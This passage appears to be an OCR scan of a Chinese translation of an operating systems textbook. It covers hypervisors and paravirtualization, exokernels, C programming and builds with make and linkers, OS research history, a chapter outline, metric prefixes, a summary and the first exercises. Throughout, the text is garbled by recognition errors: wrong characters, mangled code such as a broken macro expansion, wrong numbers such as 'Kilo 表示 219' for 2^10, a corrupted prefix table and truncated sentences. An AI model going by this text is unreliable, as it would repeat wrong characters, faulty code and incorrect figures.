虚拟 化 在 Web 托 管 世 界 里 也 很 流行 。 没 有 虚拟 化 ，Web 托 省 客户 新 
只 能 共享 托管 《在 web 服务器 上 给 客户 端 一 个 账号 ， 但 是 不 能 控制 整个 





服务 器 软件 ) 以 及 独占 托管 “提供 客 户 端 整个 机 器 ， 这 样 虽 然 很 赤 活 ， 
但 是 对 于 小 型 或 中 型 Web 站 氮 而 言 ， 成 本 效益 比 不 高 ) 。 当 Web 托 管 公 
司 提供 租用 虚拟 机 时 ， 一 全 物理 机 器 就 可 以 运行 许多 虚拟 机 ， 每 个 虚拟 
机 看 起 来 都 是 一 全 完全 的 机 器 。 租 用 虚拟 机 的 客户 端 可 以 运行 目 己 想 使 
用 的 操作 系统 和 软件 ， 但 是 只 要 文 付 独占 一 台 机 需 的 几 分 之 一 的 费用 

《因为 同一 台 物 理 机 器 可 以 同时 文 持 多 人 台 虚 拟 机 ) 。 














虚拟 化 的 为 外 一 个 用 途 是 ， 为 希望 同时 运行 两 个 或 多 个 操作 系统 ， 
比如 Windows 和 Linux 的 最 终 用 户 服务 ， 茶 个 偶 好 的 应 用 程序 可 运行 在 
一 个 操作 系统 上 ， 而 其 他 的 应 用 程序 可 运行 在 不 同 的 操作 系统 上 。 如 图 
1-29a 所 示 的 情形 ， 而 术语 “虚拟 机 监控 程序 ”近年 来 已 经 变化 成 类 型 1 虚 
拟 机 管理 程序 (type 1 hypervisor) 。 











客户 操作 系统 进程 
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类 型 1 虚拟 机 管理 程序 主机 操作 系统 
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图 1-29 a RAR WIE LA; b) 类 型 2 虚拟 机 管理 程序 


现在 考察 软件 。 虚 拟 机 的 吸引 力 是 没有 争议 的 ， 问 题 在 于 实现 。 为 
了 在 一 台 计 算 机 上 运行 虚拟 机 软件 ， 其 CPU 必须 被 虚拟 化 〈Popek 和 
Goldberg, 1974) 。 不 过 在 外 壳 中 ， 存 在 一 些 问题 。 当 运行 虚拟 机 《在 
用 户 态 中 ) 的 操作 系统 执行 某 个 特权 指令 时 ， 比 如 修改 PSW 或 进行 IO 
操作 ， 硬 件 实际 上 陷入 到 了 虚拟 机 中 ， 这 样 有 关 指 令 就 可 以 在 软件 中 模 
拟 。 在 某 些 CPU 上 特别 是 Pentium 和 它 的 后 继 者 ， 以 及 其 克隆 版 中 ) 
试图 在 用 户 态 中 执行 特权 指令 时 ， 会 被 忽略 掉 。 这 样 一 种 特性 ， 使 得 在 
这 类 硬件 中 无 法 实现 虚拟 机 ， 这 也 解释 了 PC 机 世界 中 ， 缺 乏 对 虚拟 机 
兴趣 的 原因 。 当 然 ， 对 于 Pentium 而 言 ， 还 有 解释 器 可 以 运行 在 Pentium 
上 ， 但 是 其 性 能 丧失 了 5 一 10 倍 ， 这 样 对 于 要 求 高 的 工作 来 说 ， 就 没有 
意义 了 。 











由 于 20 世 纪 90 年 代 若 干 学 术 研 究 小 组 的 努力 ， 特 别 是 斯 坦 福 大 学 的 
Disco (Bugnion 等 人 ，1997) ， 实 现 了 商业 化 产品 〈 例 如 VMware 工作 
站 ) ， 人 们 对 虚拟 机 的 热情 复兴 了 。VMware 工 作 站 是 类 型 2 虚拟 机 管理 
程序 ， 如 图 1-29b 所 示 。 与 运行 在 裸 机 上 的 类 型 1 虚拟 机 管理 程序 不 同 ， 
类 型 2 虚拟 机 管理 程序 作为 一 个 应 用 程序 运行 在 Windows、Linux 或 其 他 
操作 系统 上 ， 这 些 系统 称 为 宿主 机 操作 系统 。 在 类 型 2 管理 程序 启动 
后 ， 它 从 CD-ROM 安 装 盘 中 读 入 供 选 择 的 客体 操作 系统 ， 并 安装 在 一 个 
虚拟 盘 上 ， 该 盘 实 际 只 是 宿主 机 操作 系统 文件 系统 中 的 一 个 大 文件 。 














在 客 尸 端 操 作 系 统 局 动 时 ， 它 完成 在 真实 人 硬件 上 相同 的 工作 ， 如 局 


动 一 些 后 台 进 程 ， 然 后 是 GUI。 东 些 管 理 程序 一 块 一 块 地 翻译 客户 端 操 
作 系 统 的 二 进 制 程序 ， 代 蔡 含 有 管理 程序 调用 的 特定 控制 指令 。 翻 译 后 
的 块 可 以 立即 执行 ， 或 者 缓存 起 来 供 后 续 使 用 。 


处 理 控制 指令 的 一 种 不 同方 式 是 ， 修 改 操 作 系 统 ， 删 掉 它 们 。 这 种 
方式 不 是 真正 虚拟 化 ， 而 是 准 虚拟 化 〈paravirtualization ) 。 我 们 将 在 第 
8 章 具 体 讨 论 虚 拟 化 。 


3.Java 虚 拟 机 


1.7.6 ”外 核 


与 虚拟 机 克隆 真实 机 器 不 同 ， 男 一 种 策略 是 对 机 器 进行 分 区 ， 换 句 
话说 ， 给 每 个 用 户 整 个 资源 的 一 个 子 集 。 这 样 ， 某 一 个 虚拟 机 可 能 得 到 
破 盘 的 0 至 1023 舟 块 ， 而 另 一 全 虚拟 机 会 得 到 1024 至 2047 租 块 ， 等 等 。 


在 底层 中 ， 一 种 称 为 外 核 (exokernel，Engler 等 人 ，1995) 的 程序 
在 内 核 态 中 运行 。 它 的 任务 是 为 虚拟 机 分 配 资源 ， 并 检查 试图 使 用 这 些 
资源 的 企图 ， 以 确保 没有 机 器 会 使 用 他 人 的 资源 。 每 个 用 户 层 的 虚拟 机 
可 以 运行 自己 的 操作 系统 ， 如 VM/370 和 Pentium 虚 拟 8086 等 ， 但 限制 在 
只 能 使 用 已 经 申请 并 且 获 得 分 配 的 那 部 分 资源 。 








外 核 机 制 的 优点 是 ， 它 减少 了 映像 层 。 在 其 他 的 设计 中 ， 每 个 虚拟 
机 都 认为 它 有 目 己 的 磁盘 ， 其 盘 块 写 从 0 到 最 大 编号， 这 样 虚拟 机 监控 
程序 必须 维护 一 张 表格 用 以 重 映像 磁盘 地 址 〈 以 及 其 他 资源 ) 。 有 了 外 
核 这 个 重 映像 处 理 束 不 需要 了 。 外 核 只 需要 记录 已 经 分 配给 各 个 虚拟 机 
的 有 关 资 源 即 可 。 这 个 方法 还 有 一 个 优点 ， 它 将 多 道 程 序 〈 在 外 核 内 ) 
与 用 户 操作 系统 代码 《在 用 户 空 间 内 ) 加 以 分 离 ， 而 且 相 应 负载 并 不 
重 ， 这 是 因为 外 核 押 做 的 一 切 ， 只 是 保持 多 个 虚拟 机 彼此 不 发 生 冲 突 。 
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操作 系统 通 第 是 由 许多 程序 员 写 成 的 ， 包 括 很 多 部 分 的 大 型 C (有 
时 是 C++) 程序 。 用 于 开发 操作 系统 的 环境 ， 与 个 人 《如 学 生 ) 用 于 编 
写 小 型 Java 程 序 的 环境 是 非常 不 同 的 。 本 节 试 图 为 那些 有 时 编写 Jave 的 
程序 员 简 要 地 介绍 编写 操作 系统 的 环境 。 





1.8.1 CEF 


本 部 分 不 是 C 语 言 的 指南 ， 而 是 一 个 有 关 C 和 Java 之 间 的 关键 差别 的 
介绍 。Java 是 基于 C 的 ， 所 以 两 者 之 间 有 许多 类 似 之 处 。 两 者 都 是 


据 类 型 是 整数 (包括 短 整 数 和 长 整数 ) 、 字 答 和 浮 点 数 等 。 使 用 数组 、 
结构 体 和 联合 ， 可 以 构造 组 合 数据 类 型 。C 语 言 中 的 控制 语句 与 Java 类 
似 ， 包 括 过 、switch、for 以 及 while 等 语句 。 在 这 两 个 语言 中 ， 函 数 和 参 
数 大 致 相同 。 








一 项 C 语 言 中 有 的 而 Java 中 没有 的 特点 是 显 式 指针 (explicit 
pointer) 。 指 针 是 一 种 指向 〈 即 包含 对 象 的 地 址 〉 一 个 变量 或 数据 结构 
的 变量 。 考 虑 下 面 的 语句 


char cl, c2, *p; 


cl='c'; 
p=&cl; 
C2=*p; 





这 些 语句 声明 c1 和 c2 是 字符 变量 ， 而 p 是 指向 一 个 字符 的 变量 《〈 即 
包含 字符 的 地 址 ) 。 第 一 个 赋值 语句 将 字符 c 的 ASCII 代 码 存 到 变量 cl 
中 。 第 二 个 语句 将 cl 的 地 址 赋 给 指针 变量 p。 第 三 个 语句 将 由 p 指 向 变量 
的 内 容 赋 给 变量 c2， 这 样 ， 在 这 些 语 名 执行 之 后 ，c2 也 含有 c 的 ASCII 代 
码 。 在 理论 上 ， 指 针 是 输入 类 型 ， 所 以 不 能 将 浮 点 数 地 址 由 给 一 个 字符 
虽 针 ， 但 是 在 实践 中 ， 编 译 器 接受 这 种 赋值 ， 尽 管 有 时 给 出 一 个 警告 。 
指针 是 一 种 非常 强大 的 结构 ， 但 是 如 果 不 仔细 使 用 ， 也 会 是 造成 大 量 
误 的 一 个 原因 。 





ite 


C 语 言 中 没有 的 包括 内 建 字符 串 、 线 程 、 包 、 类 、 对 象 、 类 型 安全 
(type safety) 以 及 垃圾 回收 (garbage collection) 等 。 最 后 这 一 个 是 操 
作 系 统 的 一 个 “淋浴 器 塞 子 ”。 在 C 中 分 配 的 存储 空间 或 者 是 静态 的 ， 或 
者 是 程序 员 明 确 分 配 和 释放 的 ， 通 常 使 用 malloc 以 及 free 库 函数 。 正 是 
由 于 后 面 这 个 性 质 一 一 全 部 由 程序 员 控 制 所 有 内 存 一 一 而 且 是 用 明确 的 
Het, 使 得 C 语 言 对 编写 操作 系统 而 言 非常 有 吸引 力 。 操 作 系统 从 一 定 
程度 上 来 说 ， 实 际 上 是 个 实时 系统 ， 即 便 通 用 系统 也 是 实时 系统 。 当 中 
呆 发 生 时 ， 操 作 系 统 可 能 只 有 知 干 微 秒 去 完成 特定 的 操作 ， 人 否则 就 会 丢 
失 关 键 的 信息 。 在 任意 时 刻 启 动 垃圾 回收 功能 是 不 可 接受 的 。 




















1.8.2 koe 











一 个 操作 系统 项 目 通常 包括 多 个 目录 ， 每 个 目录 都 含有 许多 .c 文 
件 ， 这 些 文件 中 存 有 系统 某 个 部 分 的 代码 ， 而 一 些 .h 头 文件 则 包含 供 一 
个 或 多 个 代码 文件 使 用 的 声明 以 及 定义 。 头 文件 还 可 以 包括 简单 的 宏 ， 
诸如 








#define BUFFER SIZE 4096 




















宏 允 许 程序 员 命 名 常数 ， 这 样 在 代码 中 出 现 的 BUFFER_SIZE， 在 
编译 时 该 常数 就 被 数值 4096 所 蔡 代 。 良 好 的 C 程 序 设计 实践 应 该 除了 0， 
1 和 -1 之 外 命名 所 有 的 常数 ， 有 时 把 这 三 个 数 也 进行 命名 。 宏 可 以 附带 
参数 ， 例 如 








#define max (a,b) (a>b?a:b) 








i=max (j; k+1) 





从 而 得 到 


i= (3 >k+1?3:k41) 








将 j 与 k+1 之 间 的 较 大 者 存储 在 i 中 。 头 文件 还 可 以 包含 条 件 编译 ， 例 
如 


























如 果 宏 PENTIUM 有 定义 ， 而 不 是 其 他 ， 则 编译 进 对 intel_int_ack 函 
数 的 调用 。 为 了 分 割 与 结构 有 关 的 代码 ， 大 量 使 用 了 条 件 编 译 ， 这 样 只 
有 当 系 统 在 Pentium 上 编译 时 ， 一 些 特 定 的 代码 才 会 被 插入 ， 其 他 的 代 
人 码 仅 当 系 统 在 SPARC 等 机 器 上 编译 时 才 会 插入 。 通 过 使 用 ##include 指 
令 ， 一 个 .c 文 件 体 可 以 含有 零 个 或 多 个 头 文件 。 


18.3 ”大 型 编程 项 目 


为 了 构建 操作 系统 ， 每 个 .c 修 C 编 译 占 编译 成 一 个 目标 文件 。 目 标 
文件 使 用 后 级 .o， 含 有 目标 机 器 的 三 进 制 代码 。 它 们 可 以 随后 直接 在 
CPU 上 运行 。 在 C 的 世界 里 ， 没 有 类 似 于 Java 字 节 代 码 的 东西 。 





C 编 译 器 的 第 一 道 称 为 C 预 处 理 器 。 在 它 读 入 每 个 .c 文 件 时 ， 每 当 遇 
到 一 个 机 nclude 指 令 ， 它 束 取 来 该 名 称 的 头 文件 ， 并 加 以 处 理 、 扩 展 
宏 、 处 理 条 件 编译 (以 及 其 他 事务 ) ， 然 后 将 结果 传递 给 编译 器 的 下 一 
道 ， 仿 佛 它们 原先 就 包含 在 该 文件 中 一 样 。 














由 于 操作 系统 非常 大 (五 百 万 行 代码 是 很 寻常 的 ) ， 每 当 文件 修改 
后 就 重新 编译 是 不 能 妨 受 的 。 男 一 方 面 ， 改 变 了 用 在 成 干 个 文件 中 的 一 
个 关键 头 文件 ， 确 实 需要 重新 编译 这 些 文件 。 没 有 一 定 的 协助 ， 要 想 记 
录 哪 个 目标 文件 与 哪个 头 文件 相关 是 完全 不 可 行 的 。 








幸运 的 是 ， 计 算 机 非常 善于 处 理事 务 分 类 。 在 UNIX 系 统 中 ， 有 个 
名 为 make 的 程序 〈 其 大 量 的 变 体 如 gmake、pmake 等 ) ， 它 读 入 
Makefile， 该 Makefile 说 明 哪个 文件 与 哪个 文件 相关 。make 的 作用 是 ， 
在 构建 操作 系统 二 进 制 码 时 ， 检 查 此 刻 需 要 哪个 目标 文件 ， 而 且 对 于 每 
个 文件 ， 检 查 自从 上 次 目标 文件 创建 之 后 ， 是 否 有 任何 它 依赖 (代码 和 
头 文件 ) 的 文件 已 经 被 修改 了 。 如 果 有 ， 目 标 文件 需要 重新 编译 。 在 








make 确 定 了 哪个 .o 文 件 需要 重新 编译 之 后 ， 它 调用 C 编 译 器 重新 编译 这 
些 文 件 ， 这 样 ， 就 把 编译 的 次 数 减少 到 最 低 限 度 。 在 大 型 项 目 中 ， 创 建 
Makefile 是 一 件 容易 出 错 的 工作 ， 所 以 出 现 了 一 些 工 具 使 该 工作 能 够 自 
动 完成 。 


一 旦 所 有 的 .o 文 件 都 已 经 束 绪 ， 这 些 文件 被 传递 给 称 为 linker 的 程 
序 ， 将 其 组 合成 一 个 单个 可 执行 的 二 进 制 文件 。 此 时 ， 任 何 被 调用 的 库 
函数 都 已 经 包含 在 内 ， 函 数 之 间 的 引用 部 已 经 解决 ， 而 机 器 地 址 也 都 按 
需要 分 配 完毕 。 在 linker 完 成 之 后 ， 得 到 一 个 可 执行 程序 ， 在 UNIX 中 传 
统 上 称 为 a.0ut 文 件 。 这 个 过 程 中 的 各 种 部 分 如 图 1-30 所 示 ， 图 中 的 一 个 
程序 包含 三 个 C 文 件 ， 两 个 头 文件 。 这 里 虽然 讨论 的 是 有 关 操 作 系 统 的 
开发 ， 但 是 所 有 内 容 对 开发 任何 大 型 程序 而 言 都 是 适用 的 。 














C 
Fisch FE is 


C 
编译 部 
eC @ Ye 


可 执行 的 二 
© 进 制 程序 


图 1-30 编译 C 和 头 文件 ， 构 建 可 执行 文件 的 过 程 


1.8.4 运行 模型 


在 操作 系统 二 进 制 代码 链接 完成 后 ， 计 算 机 就 可 以 重新 局 动 ， 新 的 
操作 系统 开始 运行 。 一 旦 运行 ， 系 统 会 动态 调 入 那些 没有 静态 包括 在 二 
进 制 代码 中 的 模块 ， 诸 如 设备 驱动 和 文件 系统 。 在 运行 过 程 中 ， 操 作 系 
统 可 能 由 知 干 段 组 成 ， 有 文本 段 〈 程 序 代 码 ) 、 数 据 段 和 堆栈 段 。 文 本 
段 通 第 是 不 可 改变 的 ， 在 运行 过 程 中 不 可 修改 。 数 据 段 开 始 时 有 一 定 的 
大 小 ， 并 用 确定 的 值 进行 初始 化 ， 但 是 随后 就 被 修改 了 ， 其 大 小 随 需 要 
增长 。 堆 栈 段 被 初始 化 为 宇 ， 但 是 随 着 对 函数 的 调用 和 从 函数 返回 ， 堆 
栈 段 时 时 刻 刻 在 增长 和 缩小 。 通 常 文本 段 放置 在 接近 内 存 底部 的 位 置 ， 
数据 段 在 其 上 面 ， 这 样 可 以 同上 增长 。 而 堆栈 段 处 在 局 位 的 虚拟 地 址 ， 
具有 问 下 增长 的 能 力 ， 不 过 不 同系 统 的 工作 方式 各 有 差别 。 











在 所 有 情形 下 ， 操 作 系 统 代码 都 是 直接 在 人 硬件 上 执行 的 ， 不 用 解释 
器 ， 也 不 是 即时 编译 ， 如 Java 通 常 做 的 那样 。 


1.9 有关 操作 系统 的 研究 











计算 机 科学 是 快速 发 展 的 领域 ， 很 难 预测 其 下 一 步 的 发 展 方向 。 在 
大 学 和 产业 研究 实验 室 中 的 研究 人 员 们 始终 在 思考 新 的 思想 ， 这 些 新 思 
想 中 的 某 一 些 内 容 并 没有 什么 用 处 ， 但 是 有 些 新 思想 会 成 为 未 来 产品 的 
基石 ， 并 对 产业 界 和 用 户 产 生 广 泛 的 影响 。 当 然 ， 事 后 解说 什么 是 什么 
要 比 在 当时 说 明 容 易 得 多 。 将 小 麦 从 穆 子 中 分 离 出 来 是 非常 困难 的 ， 因 
为 一 种 思想 从 出 现 到 形成 影响 利 冲 需要 20 一 30 年 。 











例如 ， 当 艾森豪威尔 总 统 在 1958 年 建立 国防 部 高 级 研究 项 目 署 
CARPA) 时 ， 他 试图 通过 五 角 大 楼 的 研究 预算 来 削弱 海军 和 空军 并 维 
护 陆 军 的 地 位 。 他 并 不 是 想 要 发 明 Internet。 但 是 ARPA 做 的 一 件 事 是 给 
予 一 些 大 学 资助 ， 用 以 研究 模糊 不 清 的 包 交 换 概念 ， 这 个 研究 很 快 导致 
了 第 一 个 实验 包 交 换 网 的 建立 ， 即 ARPANET。 该 网 在 1969 年 启用 。 没 
有 多 久 ， 其 他 被 ARPA 资 助 的 研究 网 络 也 连接 到 ARPANET 上 ， 于 是 
Interneti 诈 生 了 。Tnternet 愉 快 地 为 学 术 研 究 人 员 们 互相 发 送 了 20 年 的 电 
子 邮 件 。 到 了 20 世 纪 90 年 代 早 期 ，Tim Berners-Lee 在 日 内 瓦 的 CERN 研 
究 所 发 明了 万 维 网 (World Wide Web) ， 而 Marc Andreesen 在 伊利 诺 伊 
大 学 为 万 维 网 写 了 一 个 图 形 浏览 器 。 突 然 地 ，Intemet 上 充满 了 年 青 人 的 
聊天 活动 。 在 知道 了 这 一 切 之 后 ， 艾 森 又 威 尔 总 统 可 能 气 得 在 他 的 坟墓 
中 打滚 呢 。 





对 操作 系统 的 研究 也 导致 了 实际 操作 系统 的 戏剧 性 变化 。 正 如 我 们 
较 早 所 讨论 的 ， 第 一 代 商 用 计算 机 系统 都 是 批 处 理 系统 ， 直 到 20 世 纪 60 
年 代 早 期 M.ITI. 发 明了 交互 式 分 时 系统 为 止 。20 世 纪 60 年 代 后 期 ， 即 在 
Doug Engelbart 于 斯 坦 福 研 究 院 发 明 鼠 标 和 图 形 用 户 接口 之 前 ， 所 有 的 
计算 机 都 是 基于 文本 的 。 有 谁 会 知道 下 一 个 发 明 将 会 是 什么 呢 ? 





在 本 小 节 和 本 书 中 相关 的 其 他 章节 中 ， 我 们 会 简要 地 介绍 一 些 在 过 
去 5 至 10 年 中 操作 系统 的 研究 工作 ， 这 是 为 了 让 读者 了 解 可 能 会 出 现 什 
么 。 这 个 介绍 当然 不 全 面 ， 而 且 主 要 依据 在 高 水 平 的 期 刊 和 会 议 上 已 经 
发 表 的 文章 ， 因 为 这 些 文章 为 了 得 以 发 表 至 少 需要 通过 严格 的 同行 评估 
过 程 。 在 有 关 研 究 内 容 一 节 中 所 引用 的 多 数 文章 ， 它 们 或 者 发 表 在 
ACM 刊 物 、IEEE 计 算 机 协会 刊物 或 者 USENIX 刊 物 上 ， 并 对 这 些 组 织 的 
CE) 成 员 们 在 Internet 上 开放 。 有 关 这 些 组 织 的 更 多 信息 以 及 它们 的 
数字 图 书馆 ， 可 以 访问 : 





ACM http://www.acm.org 
IEEE Computer Society http://www.computer.org 
USENIX http://www.usenix.org 


实际 上 ， 上 所 有 的 操作 系统 研究 人 员 都 认识 到 ， 目 前 的 操作 系统 是 一 
个 大 的 、 不 灵活 、 不 可 靠 、 不 安全 和 带 有 错误 的 系统 ， 而 且 特 定 的 某 个 
操作 系统 较 其 他 的 系统 有 更 多 的 错误 《这 里 略 去 了 名 称 以 避免 责任 ) 。 
所 带 来 的 结果 是 ， 大 量 的 研究 集中 于 如 何 构造 更 好 的 操作 系统 。 近 来 出 


版 的 文献 有 如 下 一 些 ， 关 于 新 操作 系统 (Krieger A, 2006) ， 操 作 系 
统 结构 〈Fassino 等 人 ，2002) ， 操 作 系统 正确 性 〈Elphinstone 等 人 ， 
2007; Kumar 和 Li，2002; Yang 等 人 ，2006) ， 操 作 系 统 可 靠 性 〈Swift 
等 人 ，2006; LeVasseur 等 人 ，2004) ， 虚 拟 机 (Barham 等 人 ，2003; 
Garfinkel 等 人 ，2003; King 等 人 ，2003; Whitaker 等 人 ，2002) ， 病 毒 
和 蠕虫 (Costa 等 人 ，2005; Portokalidis 等 人 ，2006; Tucek 等 人 ， 

2007; Vrable 等 人 ，2005) ， 错 误 和 排 错 (Chou 等 人 ，2001; King 等 
人 ，2005) ， 超 线程 与 多 线程 (Fedorova，2005; Bulpin 和 Pratt， 

2005) ， 用 户 行为 《Yu 等 人 ，2006) ， 以 及 许多 其 他 课题 。 


1.10 本 书 其 他 部 分 概要 


我 们 已 经 叙述 完毕 引 论 ， 并 且 描 绘 了 乌 敬 式 的 操作 系统 图 景 。 现 在 
进入 具体 细 市 的 时 候 了 。 正 如 前 面 已 经 叙述 的 ， 从 程序 员 的 观点 来 
看 ， 操 作 系 统 的 基本 目的 是 提供 一 些 关 键 的 抽象 ， 其 中 最 重要 的 是 进程 
和 线程 、 地 址 空间 以 及 文件 。 所 以 后 面 三 草 都 是 有 关 这 些 关 键 主题 的 。 











第 2 章 讨论 进 程 与 线程 ， 包 括 它 们 的 性 质 以 及 它们 之 间 如 何 通 信 。 
这 一 章 还 给 出 了 大 量 关 于 进程 间 如 何 通信 的 例子 以 及 如 何 避 免 东 些 错 








第 3 章 具 体 讨论 地 址 空间 以 及 关联 的 内 存 管理 。 讨 论 虚 拟 内 存 等 
要 读 题 ， 以 及 相关 的 概念 ， 如 页 面 处 理 和 分 段 等 。 


第 4 章 里 ， 我 们 会 讨论 有 关 文 件 系统 的 所 有 重要 内 容 。 在 某 种 程度 
上 ， 用 户 大 量 看 到 的 是 文件 系统 。 我 们 将 研究 文件 系统 接口 和 文件 系统 
的 实现 。 


输入 /输出 是 第 5 章 的 内 容 。 这 一 章 介 绍 设备 独立 性 和 设备 依赖 性 的 
概念 。 将 把 若干 重要 的 设备 ， 包 括 磁盘 、 键 盘 以 及 显示 设备 作为 示例 讲 


解 。 


第 6 章 讨 论 死 锁 。 在 这 一 章 中 我 们 概要 地 说 明 什么 是 死 锁 ， 不 过 这 


章 里 有 大 量 的 内 容 需要 介绍 。 还 讨论 了 避免 死 锁 的 方法 。 


到 此 ， 我 们 完成 了 对 单 CPU 操 作 系 统 基本 原理 的 学 习 。 不 过 ， 还 有 
更 多 的 高 级 内 容 要 叙述 。 在 第 7 章 里 ， 我 们 将 了 解 多 媒体 系统 ， 这 关系 
统 的 大 量 特性 和 要 求 与 传统 的 操作 系统 存在 着 送别 。 而 在 其 他 的 篇 幅 
里 ， 我 们 会 讨论 多 媒体 的 本 质 对 调度 处 理 和 文件 系统 的 影响 。 另 一 个 高 
级 课题 是 多 处 理 器 系统 ， 包 括 多 处 理 器 、 并 行 计算 机 以 及 分 布 式 系统 。 


这 些 内 容 放 在 第 8 章 中 讨论 。 








有 一 个 非常 重要 的 主题 ， 就 是 操作 系统 安全 ， 它 是 第 9 革 的 内 容 。 
在 这 一 半 中 讨论 的 内 容 涉 及 威胁 例如， 病毒 和 蠕虫 )、 保 护 机 制 以 及 
安全 模型 。 


随后 ， 我 们 安排 了 一 些 实际 操作 系统 的 案例 。 它 们 是 Linux〈 第 10 
=) 、Windows Vista (11%) 以 及 Symbian 〈 第 12 章 ) 。 本 书 以 第 13 
章 关 于 操作 系统 设计 的 一 些 思考 作为 结 


1.11 公制 单位 


为 了 避免 混乱 ， 有 必要 在 本 书 中 特别 指出 ， 考 虑 到 计算 机 科学 的 通 
用 性 ， 所 以 我 们 采用 公制 以 代替 传统 的 英制 。 在 图 1-31 中 列 出 了 主要 的 
公制 前 级 。 前 级 用 首 字 缩写 而 成 ， 凡 是 单位 大 于 1 的 首 字母 均 大 写 。 这 
样 ， 一 个 1TB 的 数据 库 占据 了 10 字 节 的 存储 空间 ， 而 100 psec (或 
100ps) 的 时 钟 每 隔 1020 s 的 时 间 滴 答 一 次 。 由 于 mili 和 micro 均 以 字 
母 “<m” 开 头 ， 所 以 必须 作出 区 分 两 者 的 选择 。 通 常 ， 用 “m” 表 示 milli， 

而 用 “ph”( 希 腊 字 母 mu) 表示 micro。 





















































| 指数 具体 表示 前 级 和 [指数 RARR | 前缀 | 

[10° | 0.001 mini | 10° | 1000 | Kilo 
10° | 0.000001 micro | 10° p 1.000 000 | Mega 
10° | 0.000000001 nano f 10° i a 1 000 000 000 | Giga 

| 10° | 0.000000000001 pico | 10° | 1 000 000 000 000 | Tera 
10° | 0.000000000000001 femto [10 | 1 000 000 000 000 000 | Peta 
10-® | 0.0000000000000000001 atto || 10% 1 000 000 000 000 000 000 | Exa 
10" | 0.0000000000000000000001 zepto | 10” 1 000 000 000 000 000 000 000 | Zetta 
10% | 0.0000000000000000000000001 | yocto [ 10% | 1000 000 000 000 000 000 000 000 | Yotta | 





图 1-31 主要 的 公制 前 级 





这 里 需要 说 明 的 还 有 关于 存储 器 容量 的 上 度量， 在 通常 的 工业 实践 
中 ， 各 个 单位 的 含义 稍 有 不 同 。 这 里 Kilo 表 示 219 (1024) 而 不 是 103 
(1000) ， 因 为 存储 占 总 是 2 的 曙 。 这 样 1KB 存 储 絮 就 有 1024 个 字 市 ， 
而 不 是 1000 个 字 节 。 类 似 地 ，1MB 存 储 器 有 220 (1048576) 个 字 节 


1GB 存 储 器 有 230 (1 073 741 824) 个 字 节 。 但 是 ，1Kbps 的 通信 线路 每 


秒 传送 1000 个 位 ， 而 10Mbps 的 局 域 网 在 10 000 000 位 / 秒 的 速率 上 运行 ， 
因为 这 里 的 速率 不 是 2 的 容 。 很 不 幸 ， 许 多 人 倾向 于 将 这 两 个 系统 泥 
淆 ， 特 别 是 混淆 关于 磁盘 容量 的 度量 。 在 本 书 中 ， 为 了 避免 含糊 ， 我 们 
使 用 KB、MB 和 GB 分 别 表示 21 字 节 2 =F FD 字 节 ， 而 用 符号 


Kbps、Mbps 和 和 Gbps 分 别 表示 103 bps. 10° bps 和 10? bps. 

















1.12 aH 


考察 操作 系统 有 两 种 观点 : 资源 管理 观点 和 扩展 的 机 器 观点 。 在 资 
源 管理 的 观点 中 ， 操 作 系 统 的 任务 是 有 效 地 管理 系统 的 各 个 部 分 。 在 扩 
展 的 机 器 观点 中 ， 系 统 的 任务 是 为 用 户 提供 比 实际 机 器 更 便于 运用 的 抽 
象 。 这 些 抽象 包括 进程 、 地 址 空间 以 及 文件 。 


操作 系统 的 历史 很 长 ， 从 操作 系统 开始 蔡 代 操作 人 员 的 那天 开始 ， 
到 现代 多 道 程序 系统 ， 主 要 包括 早期 批 处 理 系统 、 多 道 程序 系统 以 及 个 
人 计算 机 系统 。 


由 于 操作 系统 同人 硬件 的 交互 密切 ， 掌 握 一 些 硬 件 知识 对 于 理解 它们 
是 有 荔 的 。 计 算 机 由 处 理 器 、 和 存储 器 以 及 VO 设备 组 成 。 这 些 部 件 通 过 
总 线 连接 。 





所 有 操作 系统 构建 所 依赖 的 基本 概念 是 进程 、 存 储 管理 、IO 管 
理 、 文 件 管 理 和 安全 。 这 些 内 容 都 将 用 后 续 的 一 章 来 讲述 





任何 操作 系统 的 核心 是 它 可 处 理 的 系统 调用 集 。 这 些 系统 调用 真实 
地 说 明了 操作 系统 所 做 的 工作 。 对 于 UNIX， 我 们 已 经 考察 了 四 组 系统 
调用 。 第 一 组 系统 调用 同 进程 的 创建 和 终结 有 关 ; 第 二 组 用 于 读 写 文 
件 ; 第 三 组 用 于 目录 管理 ， 第 四 组 包括 各 种 杂项 调用 。 





操作 系统 构建 方式 有 多 种 。 最 音 见 的 有 单 体 系统 、 层 次 化 系统 、 微 
内 核 系 统 、 客 户 机 -服务 器 系统 、 虚 拟 机 系统 和 外 核 系统 。 


习题 

1. 什 么 是 多 道 程序 设计 ”? 

2. 什 么 是 SPOOLing? 读者 是 否认 为 将 来 的 高 级 个 人 计算 机 会 把 
SPOOLing 作 为 标准 功能 ? 


3. 在 早期 计算 机 中 ， 每 个 字 节 的 读 写 直接 由 CPU 处 理 ( 即 没有 
DMA) 。 对 于 多 道 程序 而 言 这 种 组 织 方 式 有 什么 含义 ? 





4. 系 列 计算 机 的 思想 在 20 世 纪 60 年 代 由 IBM 引 入 进 System/360 大 型 
机 。 现 在 这 种 思想 已 经 消亡 了 还 是 继续 活跃 着 ? 


5. 缓 慢 采 用 GUI 的 一 个 原因 是 支持 它 的 硬件 的 成 本 (高 郧 ) 。 为 了 
文 持 25 行 80 列 字符 的 单 色 文本 屏幕 应 该 需要 多 少 视频 RAM? 对 于 
1024x768 像 素 24 位 色彩 位 图 需要 多 少 视频 RAM? 在 1980 年 ($5/KB) 这 些 
RAM 的 成 本 是 多 少 ? 现在 它 的 成 本 是 多 少 ? 








6. 在 建立 一 个 操作 系统 时 有 几 个 设计 目的 ， 例 如 资源 利用 、 及 时 
性 、 健 壮 性 等 。 请 列举 两 个 可 能 互相 矛盾 的 设计 目的 。 





7. 下 面 的 哪 一 条 指令 只 能 在 内 核 态 中 使 用 ? 


a) ae IE ATA HY HIB» 


b) 读 日 期 -时 间 时 钟 。 
oO 设 置 日 期 -时 间 时 钟 。 
d) 改 变 存储 器 映像 。 


8. 考 虑 一 个 有 两 个 CPU 的 系统 ， 并 且 每 一 个 CPU 有 两 个 线程 〈 超 线 
Fe) 。 假 设 有 三 个 程序 PO，P1，P2， 分 别 以 运行 时 间 5ms，10ms，20ms 
开始 。 运 行 这 些 程序 需要 多 少时 间 ? 假设 这 三 个 程序 都 是 100% 限 于 


CPU, EZITE, HH E REMA MECU. 


9 一 台 计 算 机 有 一 个 四 级 流水 线 ， 每 一 级 都 花费 相同 的 时 间 执行 其 
工作 ， 即 lns。 这 人 台 机 器 每 秒 可 执行 多 少 条 指令 ? 





